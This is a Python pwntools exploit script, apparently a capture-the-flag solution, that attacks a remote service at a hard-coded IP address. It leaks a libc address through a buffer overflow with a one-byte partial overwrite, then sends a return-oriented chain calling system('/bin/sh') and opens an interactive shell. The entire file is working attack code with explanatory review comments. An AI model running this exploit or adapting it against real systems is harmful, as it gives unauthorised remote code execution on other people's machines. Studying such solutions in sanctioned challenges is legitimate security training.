
```
#!/usr/bin/env python3

from pwn import *

# Two-stage script against the remote service: stage 1 reads back a pointer
# to derive a base address, stage 2 sends a return-oriented chain built from
# offsets in the supplied libc.
# NOTE(review): every constant below (520, 0xc3, 0x271c3, 0x27765) is tied to
# this particular libc.so.6 and target build; none of them is derived at runtime.
PAD_LEN = 520

libc = ELF("./libc.so.6")
conn = remote("52.59.124.14",10034)

# Stage 1: PAD_LEN filler bytes plus exactly one extra byte (0xc3). send() is
# used rather than sendline(), so no newline is appended after that byte.
filler = b"\x90" * PAD_LEN
conn.send(filler + p8(0xc3))

# Skip the filler in the reply; whatever follows is treated as a pointer.
# presumably the service echoes its input without terminating it, so the
# bytes after the filler are the adjacent saved address -- confirm against
# the challenge binary.
conn.recvuntil(filler)

# Gadget offsets relative to the libc base.
pop_rdi = 0x27765
ret_gadget = pop_rdi + 1  # the byte after `pop rdi`, i.e. a bare `ret`

# Read up to the 0x7f byte, pad to 8 bytes and unpack as a 64-bit value.
# The latin-1 round trip maps each byte to one character, so u64() receives
# text rather than bytes here.
raw_ptr = conn.recvuntil(b"\x7f")
padded_ptr = raw_ptr.decode('latin-1').ljust(8,'\x00')
# 0x271c3 ends in 0xc3, matching the single byte written in stage 1.
libc_base = u64(padded_ptr) - 0x271c3

# Stage 2: same padding length, then the chain. Order matters: load the
# "/bin/sh" address into rdi, one extra `ret` (presumably for 16-byte stack
# alignment before the call -- TODO confirm), then system().
binsh_offset = next(libc.search(b"/bin/sh\x00"))
chain_addrs = (
    libc_base + pop_rdi,
    libc_base + binsh_offset,
    libc_base + ret_gadget,
    libc_base + libc.sym.system,
)
payload = b"A" * PAD_LEN + b"".join(p64(addr) for addr in chain_addrs)
conn.send(payload)
conn.interactive()
```